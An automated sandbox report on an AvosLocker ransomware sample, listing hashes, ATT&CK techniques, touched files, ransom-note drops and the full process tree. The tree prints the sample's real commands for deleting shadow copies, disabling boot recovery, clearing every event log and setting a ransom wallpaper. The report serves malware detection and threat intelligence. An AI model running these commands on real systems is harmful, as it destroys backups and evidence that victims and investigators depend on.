avoslocker | eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115

General

Target

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
Size

1002KB
MD5

97b34aecdcbe69cc57b4d321b0700cd9
SHA1

b2f2a027512a6f2b4ea856468eaccf6250a555d4
SHA256

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115
SHA512

5436ad5e25083f167de6a30d2aa06d4dce514a4b5a2cc6d9ca5a4b1f7d3903f2d0bb70f64fa4562b26857dac7bd36ef7c8bb5b766d4975a0fef39a01dac63327
SSDEEP

24576:Lgg34ayddj+yYCVj2EG1bWIL0oHPVRV37AXVJmUCOsvxFdUwcT:E2edj4CwE4bFbl7AqUgvrFcT

Score

10^/10

avoslocker defense_evasion evasion execution impact ransomware

Malware Config

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3664 bcdedit.exe
3728 bcdedit.exe
Renames multiple (10387) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

pid	process
3664	bcdedit.exe
3728	bcdedit.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

description ioc process

File opened (read-only) \??\Z: eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

description	ioc	process
File opened (read-only)	\??\Z:	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2114547645.png"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\plugins.dat	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BS2BARB.POC	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\VideoLAN\VLC\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.ELM	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\SpiderSolitaire.exe.mui	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipBand.dll.mui	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBLINK.POC	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\currency.html	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\fr-FR\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\STORYBB.POC	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Perspective.dotx	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\settings.css	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00183_.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeAUM_rootCert.cer	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\css\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityLetter.Dotx	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FALL_01.MID	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBARV.POC	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15035_.GIF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00443_.WMF	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\GET_YOUR_FILES_BACK.txt	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\en-US\wmlaunch.exe.mui	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\wmpnssci.dll.mui	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2384 powershell.exe
3656 powershell.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3640 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exepowershell.exepowershell.exe

pid process

1712 eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
3656 powershell.exe
2384 powershell.exe

pid	process
2384	powershell.exe
3656	powershell.exe

pid	process
3640	vssadmin.exe

pid	process
1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
3656	powershell.exe
2384	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exeWMIC.exepowershell.exevssvc.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3680	vssvc.exe
Token: SeRestorePrivilege	3680	vssvc.exe
Token: SeAuditPrivilege	3680	vssvc.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe
Token: SeBackupPrivilege	3656	powershell.exe
Token: SeSecurityPrivilege	3656	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.execmd.execmd.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1712 wrote to memory of 2972	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2972	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2972	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2972	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2984	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2984	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2984	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2984	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2012	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2012	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2012	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2012	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 1260	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 1260	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 1260	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 1260	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2028	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2028	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2028	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 1712 wrote to memory of 2028	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	cmd.exe
PID 2972 wrote to memory of 3648	2972	cmd.exe	WMIC.exe
PID 2972 wrote to memory of 3648	2972	cmd.exe	WMIC.exe
PID 2972 wrote to memory of 3648	2972	cmd.exe	WMIC.exe
PID 2028 wrote to memory of 3656	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 3656	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 3656	2028	cmd.exe	powershell.exe
PID 2012 wrote to memory of 3664	2012	cmd.exe	bcdedit.exe
PID 2012 wrote to memory of 3664	2012	cmd.exe	bcdedit.exe
PID 2012 wrote to memory of 3664	2012	cmd.exe	bcdedit.exe
PID 2984 wrote to memory of 3640	2984	cmd.exe	vssadmin.exe
PID 2984 wrote to memory of 3640	2984	cmd.exe	vssadmin.exe
PID 2984 wrote to memory of 3640	2984	cmd.exe	vssadmin.exe
PID 1260 wrote to memory of 3728	1260	cmd.exe	bcdedit.exe
PID 1260 wrote to memory of 3728	1260	cmd.exe	bcdedit.exe
PID 1260 wrote to memory of 3728	1260	cmd.exe	bcdedit.exe
PID 1712 wrote to memory of 2384	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	powershell.exe
PID 1712 wrote to memory of 2384	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	powershell.exe
PID 1712 wrote to memory of 2384	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	powershell.exe
PID 1712 wrote to memory of 2384	1712	eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe	powershell.exe
PID 2384 wrote to memory of 3848	2384	powershell.exe	reg.exe
PID 2384 wrote to memory of 3848	2384	powershell.exe	reg.exe
PID 2384 wrote to memory of 3848	2384	powershell.exe	reg.exe
PID 2384 wrote to memory of 3636	2384	powershell.exe	rundll32.exe
PID 2384 wrote to memory of 3636	2384	powershell.exe	rundll32.exe
PID 2384 wrote to memory of 3636	2384	powershell.exe	rundll32.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
"C:\Users\Admin\AppData\Local\Temp\eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe"
1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\system32\cmd.exe
  cmd /c wmic shadowcopy delete /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3648
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:3640
- C:\Windows\system32\cmd.exe
  cmd /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3664
- C:\Windows\system32\cmd.exe
  cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3728
- C:\Windows\system32\cmd.exe
  cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2114547645.png /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3848
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
    3⤵
    PID:3636

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Windows Management Instrumentation

1

T1047

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

2

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
36d08e3dadf813cefd755ba410908b16

SHA1
3ec7b14da6eaaf24f99be6c68301a6a7d05e6e5a

SHA256
4b38c6732593914ff892b2ed9fd337d4fa3cac8df096bae3fc532e606b3d1752

SHA512
8828d2f7cd763dfafff76f28ed990498a241ae6abace6fa7ce96060672216143d6c5a92eef8eacdf1060ae239c275571640328452b2e516ed90d8c14b245c52e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4c6a17abe24e6c9b1011e7791b05b7f9

SHA1
43f816186a00833788399e2085dc25243966b2f2

SHA256
01c56b2b5d1c6ef2f9f8c1760ef6e57b71e162d166b93c957d0244857e45fb6d

SHA512
276f6f5e8b60f313ac35e12bf0443bd86219d28f1d05332b3d1243430216e25909bbaad9d6db05fbf285614474aff2033f049b4545ce1c0180696fee485439d3

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
